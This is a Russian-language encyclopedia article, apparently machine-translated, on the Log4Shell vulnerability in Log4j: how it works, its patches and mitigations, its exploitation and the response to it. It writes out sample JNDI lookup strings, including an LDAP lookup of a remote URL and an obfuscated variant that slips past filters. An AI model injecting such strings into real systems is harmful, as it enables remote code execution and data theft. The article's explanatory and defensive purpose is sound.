Журнал4Shell

Log4Shell ( CVE-2021-44228 ) — уязвимость нулевого дня в Log4j , популярной платформе ведения журналов Java , предполагающая выполнение произвольного кода . ^{[2] [3]} Уязвимость существовала незамеченной с 2013 года и была раскрыта в частном порядке Apache Software Foundation , проектом которой является Log4j, Чэнь Чжаоцзюнем из команды безопасности Alibaba Cloud 24 ноября 2021 года. До того, как 10 декабря стал доступен официальный идентификатор CVE. В 2021 году уязвимость была распространена под названием «Log4Shell», данным Фри Уортли из команды LunaSec, которое первоначально использовалось для отслеживания проблемы в Интернете. ^{[2] [1] [4] [5] [6]} Apache присвоил Log4Shell рейтинг серьезности CVSS 10, самый высокий доступный балл. ^[7] Эксплойт был прост в исполнении и, по оценкам, мог затронуть сотни миллионов устройств. ^{[6] [8]}

Уязвимость использует преимущество Log4j, разрешающее запросы к произвольным LDAP и JNDI . серверам ^{[2] [9] [10]} позволяя злоумышленникам выполнять произвольный код Java на сервере или другом компьютере или утечку конфиденциальной информации. ^[5] Список затронутых программных проектов был опубликован командой Apache Security Team . ^[11] Затронутые коммерческие сервисы включают Amazon Web Services , ^[12] Cloudflare , iCloud , ^[13] Майнкрафт: Java-издание , ^[14] Steam , Tencent QQ и многие другие. ^{[9] [15] [16]} По данным Wiz и EY , уязвимость затронула 93% корпоративных облачных сред. ^[17]

Раскрытие уязвимости вызвало бурную реакцию со стороны экспертов по кибербезопасности. Компания по кибербезопасности Tenable заявила, что этот эксплойт был «самой большой и самой критической уязвимостью за всю историю». ^[18] Ars Technica назвала это «возможно, самой серьезной уязвимостью за всю историю». ^[19] и The Washington Post заявили, что описания специалистов по безопасности «граничат с апокалипсисом». ^[8]

Log4j — это ведения журналов с открытым исходным кодом , которая позволяет разработчикам программного обеспечения регистрировать платформа данные в своих приложениях. Эти данные могут включать пользовательский ввод. ^[20] Он повсеместно используется в приложениях Java, особенно в корпоративном программном обеспечении. ^[5] Первоначально написанный в 2001 году Чеки Гюлькю, сейчас он является частью Apache Logging Services, проекта Apache Software Foundation . ^[21] Том Келлерманн, член Комиссии президента Обамы по кибербезопасности, описал Apache как «одну из гигантских опор моста, который облегчает соединительную ткань между мирами приложений и компьютерной средой». ^[22]

Интерфейс именования и каталогов Java (JNDI) позволяет выполнять поиск объектов Java во время выполнения программы по указанному пути к их данным. JNDI может использовать несколько интерфейсов каталогов, каждый из которых предоставляет свою схему поиска файлов. Среди этих интерфейсов — облегченный протокол доступа к каталогам (LDAP), протокол, не специфичный для Java. ^[23] который получает данные объекта в виде URL-адреса с соответствующего сервера, локального или любого в Интернете. ^[24]

В конфигурации по умолчанию при регистрации строки Log4j 2 выполняет подстановку строки в выражениях вида ${prefix:name}. ^[24] Например, Text: ${java:version} может быть преобразован в Text: Java version 1.7.0_67. ^[25] Среди признанных выражений есть ${jndi:<lookup>}; указав поиск через LDAP, можно запросить произвольный URL-адрес и загрузить его как данные объекта Java. ${jndi:ldap://example.com/file}, например, будет загружать данные с этого URL-адреса при подключении к Интернету. Введя регистрируемую строку, злоумышленник может загрузить и выполнить вредоносный код, размещенный по общедоступному URL-адресу. ^[24] Даже если выполнение данных отключено, злоумышленник все равно может получить данные, например секретные переменные среды , поместив их в URL-адрес, и в этом случае они будут заменены и отправлены на сервер злоумышленника. ^{[26] [27]} Помимо LDAP, к другим потенциально пригодным для использования протоколам поиска JNDI относятся его безопасный вариант LDAPS, удаленный вызов методов Java (RMI), система доменных имен (DNS) и Интернет-протокол Inter-ORB (IIOP). ^{[28] [29]}

Поскольку HTTP- запросы часто регистрируются, распространенным вектором атаки является размещение вредоносной строки в URL-адресе HTTP-запроса или в обычно регистрируемом HTTP-заголовке , например: User-Agent. Ранние меры по смягчению последствий включали блокировку любых запросов, содержащих потенциально вредоносное содержимое, например ${jndi. ^[30] Такие базовые решения по сопоставлению строк можно обойти, запутав запрос: ${${lower:j}ndi, например, будет преобразован в поиск JNDI после выполнения операции над буквой в нижнем регистре. j. ^[31] Даже если входные данные, такие как имя, не регистрируются сразу, они могут быть зарегистрированы позже во время внутренней обработки и выполнения их содержимого. ^[24]

Исправления для этой уязвимости были выпущены 6 декабря 2021 года, за три дня до публикации уязвимости, в версии Log4j 2.15.0-rc1. ^{[32] [33] [34]} Исправление включало ограничение серверов и протоколов, которые могут использоваться для поиска. Исследователи обнаружили связанную ошибку CVE-2021-45046, которая допускает локальное или удаленное выполнение кода в определенных конфигурациях, отличных от стандартных, и была исправлена ​​в версии 2.16.0, которая отключила все функции использования JNDI и поддержку поиска сообщений. ^{[35] [36]} Были обнаружены еще две уязвимости в библиотеке: атака типа «отказ в обслуживании» , отслеживаемая как CVE-2021-45105 и исправленная в версии 2.17.0; и трудную для использования уязвимость удаленного выполнения кода , отслеживаемую как CVE-2021-44832 и исправленную в версии 2.17.1. ^{[37] [38]} В предыдущих версиях класс org.apache.logging.log4j.core.lookup.JndiLookup необходимо удалить из пути к классам, чтобы устранить обе уязвимости. ^{[7] [35]} Ранним рекомендуемым исправлением для более старых версий было задание системного свойства log4j2.formatMsgNoLookups к true, но это изменение не предотвращает использование CVE-2021-45046, а позже выяснилось, что в некоторых случаях поиск сообщений не отключается. ^{[7] [35]}

Более новые версии среды выполнения Java (JRE) также смягчают эту уязвимость, блокируя загрузку удаленного кода по умолчанию, хотя в некоторых приложениях все еще существуют другие векторы атак. ^{[2] [26] [39] [40]} Опубликовано несколько методов и инструментов, которые помогают обнаруживать уязвимые версии Log4j, используемые во встроенных пакетах Java. ^[41]

Там, где применение обновленных версий было невозможно из-за различных ограничений, таких как нехватка ресурсов или сторонних управляемых решений, фильтрация исходящего сетевого трафика из уязвимых развертываний была основным средством для многих. ^[42] Подход рекомендован NCC Group ^[43] и Национальный центр кибербезопасности (Великобритания) , ^[44] и является примером меры глубокоэшелонированной защиты . Об эффективности такой фильтрации свидетельствует ^[45] путем лабораторных экспериментов, проведенных с межсетевыми экранами, способными перехватывать исходящий трафик с несколькими полностью или частично уязвимыми версиями самой библиотеки и JRE .

Эксплойт позволяет хакерам получить контроль над уязвимыми устройствами с помощью Java. ^[6] Некоторые хакеры используют уязвимость для использования устройств жертв для майнинга криптовалюты , создания ботнетов , рассылки спама, установки бэкдоров и других незаконных действий, таких как программ-вымогателей . атаки ^{[6] [8] [46]} В течение нескольких дней после раскрытия уязвимости Check Point наблюдала миллионы атак, инициированных хакерами, при этом некоторые исследователи наблюдали скорость более ста атак в минуту, что в конечном итоге привело к попыткам атак на более чем 40% бизнес-сетей по всему миру. ^{[6] [22]}

По словам Cloudflare генерального директора Мэтью Принса , доказательства использования или сканирования эксплойта появились еще 1 декабря, за девять дней до того, как он был публично раскрыт. ^[47] По данным компании по кибербезопасности GreyNoise, несколько IP-адресов сканировали веб - сайты в поисках серверов, имеющих уязвимость. ^[48] Несколько ботнетов начали сканирование на наличие уязвимости, в том числе ботнет Muhstik к 10 декабря, а также Mirai и Tsunami. ^{[6] [47] [49]} Группа вымогателей Conti использовала уязвимость 17 декабря. ^[8]

По данным Check Point, некоторые спонсируемые государством группы в Китае и Иране также использовали эксплойт, но неизвестно, использовался ли эксплойт Израилем, Россией или Соединенными Штатами до раскрытия уязвимости. ^{[8] [18]} Check Point сообщила, что 15 декабря 2021 года поддерживаемые Ираном хакеры попытались проникнуть в сети израильских предприятий и правительственных учреждений. ^[8]

В США директор Агентства по кибербезопасности и безопасности инфраструктуры (CISA) Джен Истерли охарактеризовала этот эксплойт как «один из самых серьезных, которые я видел за всю свою карьеру, если не самый серьезный», объяснив, что сотни были затронуты миллионы устройств, и мы советуем производителям расставлять приоритеты в обновлениях программного обеспечения. ^{[6] [50] [46]} Гражданские агентства, заключившие контракт с правительством США, должны были до 24 декабря 2021 года исправить уязвимости. ^[8] 4 января Федеральная торговая комиссия (FTC) заявила о своем намерении преследовать компании, которые не принимают разумных мер по обновлению используемого программного обеспечения Log4j. ^[51] На встрече в Белом доме была разъяснена важность обеспечения безопасности программного обеспечения с открытым исходным кодом – часто также выполняемого в основном небольшим количеством добровольцев – для национальной безопасности. В то время как за некоторыми проектами с открытым исходным кодом следят многие , другие не имеют большого количества людей или вообще не имеют людей, обеспечивающих их безопасность. ^{[52] [53]}

Немецкий Bundesamt für Sicherheit in der Informationstechnik (BSI) определил эксплойт как находящийся на самом высоком уровне угрозы агентства, назвав его «чрезвычайно критической угрозой» (переведено). Он также сообщил, что несколько атак уже были успешными и что масштабы эксплойта пока трудно оценить. ^{[54] [55]} Нидерландов Национальный центр кибербезопасности (NCSC) начал постоянный список уязвимых приложений. ^{[56] [57]}

Канадский центр кибербезопасности (CCCS) призвал организации принять немедленные меры. ^[58] Налоговое управление Канады временно закрыло свои онлайн-сервисы после того, как узнало об уязвимости, а правительство Квебека закрыло почти 4000 своих веб-сайтов в качестве «превентивной меры». ^[59] Министерство обороны Бельгии столкнулось с попыткой взлома и было вынуждено отключить часть своей сети. ^[60]

Китая Министерство промышленности и информационных технологий приостановило работу с Alibaba Cloud в качестве партнера по разведке угроз кибербезопасности на шесть месяцев из-за того, что оно не сообщило об уязвимости в первую очередь правительству. ^[61]

Исследования, проведенные Wiz и EY ^[17] показало, что 93% облачной корпоративной среды были уязвимы для Log4Shell. 7% уязвимых рабочих нагрузок доступны в Интернете и подвержены попыткам широкого использования. По данным исследования, через десять дней после раскрытия уязвимости (20 декабря 2021 г.) в облачных средах в среднем было исправлено только 45% уязвимых рабочих нагрузок. Log4Shell затронул облачные данные Amazon, Google и Microsoft. ^[8] Microsoft попросила клиентов Windows и Azure сохранять бдительность после наблюдения за спонсируемыми государством и киберпреступниками, проверяющими системы на наличие уязвимости Log4j «Log4Shell» в течение декабря 2021 года. ^[62]

Компания управлению человеческими ресурсами и персоналом по UKG , одна из крупнейших компаний в отрасли, подверглась атаке программы-вымогателя , которая затронула крупный бизнес. ^{[19] [63]} UKG заявила, что у нее нет доказательств использования Log4Shell в инциденте, хотя аналитик Аллан Лиска из компании по кибербезопасности Recorded Future предположил, что связь, возможно, существовала. ^[63]

Поскольку более крупные компании начали выпускать исправления для уязвимости, риск для малого бизнеса увеличился, поскольку хакеры сосредоточились на более уязвимых целях. ^[46]

Некоторые персональные устройства, подключенные к Интернету, такие как смарт-телевизоры и камеры видеонаблюдения, были уязвимы для эксплойта. Некоторое программное обеспечение может никогда не получить исправление из-за прекращения поддержки производителя. ^[8]

По состоянию на 14 декабря 2021 г. ^[update] почти половина всех корпоративных сетей в мире активно исследовались, при этом за 24 часа было создано более 60 вариантов эксплойта. ^[64] Check Point Software Technologies в подробном анализе описала ситуацию как «настоящую киберпандемию» и охарактеризовала потенциальный ущерб как «неисчислимый». ^[65] В нескольких первоначальных рекомендациях преувеличивалось количество уязвимых пакетов, что приводило к ложным срабатываниям. В частности, пакет «log4j-api» был помечен как уязвимый, тогда как на самом деле дальнейшие исследования показали, что уязвим только основной пакет «log4j-core». Это было подтверждено как в исходной теме, так и в исходной теме. ^[66] и внешними исследователями безопасности. ^[67]

Журнал о технологиях Wired написал, что, несмотря на предыдущую «шумиху» вокруг многочисленных уязвимостей, «уязвимость Log4j   ... оправдывает шумиху по множеству причин». ^[18] Журнал объясняет, что широкое распространение Log4j, уязвимость, которую трудно обнаружить потенциальным целям, и простота передачи кода жертвам создали «сочетание серьезности, простоты и распространенности, которое встревожило сообщество безопасности». ^[18] Wired также описал этапы использования хакерами Log4Shell; группы криптомайнеров сначала используют уязвимость, брокеры данных затем продают «точку опоры» киберпреступникам, которые, наконец, продолжают участвовать в атаках с использованием программ-вымогателей, шпионаже и уничтожении данных. ^[18]

Амит Йоран , генеральный директор Tenable и директор-основатель Группы готовности к чрезвычайным ситуациям в США , заявил, что «[Log4Shell] на сегодняшний день является самой большой и самой критической уязвимостью за всю историю», отметив, что сложные атаки начались вскоре после ошибки, сказав: « Мы также уже видим, что его используют для атак с использованием программ-вымогателей, что, опять же, должно стать серьезным сигналом тревоги... Мы также видели сообщения о том, что злоумышленники использовали Log4Shell для уничтожения систем, даже не пытаясь получить выкуп, что является довольно необычным поведением». . ^[18] Старший исследователь угроз Sophos Шон Галлахер сказал: «Честно говоря, самая большая угроза здесь заключается в том, что люди уже получили доступ и просто сидят в нем, и даже если вы решите проблему, кто-то уже находится в сети… Это будет вокруг, пока существует Интернет». ^[18]

Согласно сообщению Bloomberg News , некоторый гнев был направлен на разработчиков Apache из-за их неспособности устранить уязвимость после того, как на конференции по кибербезопасности 2016 года были сделаны предупреждения об эксплойтах широких классов программного обеспечения, включая Log4j. ^[68]

• Веб-сайт Log4j
• Обзор NCSC Log4Shell на GitHub
• Страница «Распространенные уязвимости и риски»
• Страница национальной базы данных уязвимостей
• Проекты, затронутые уязвимостью cve-2021-44228, разработанной командой безопасности Apache.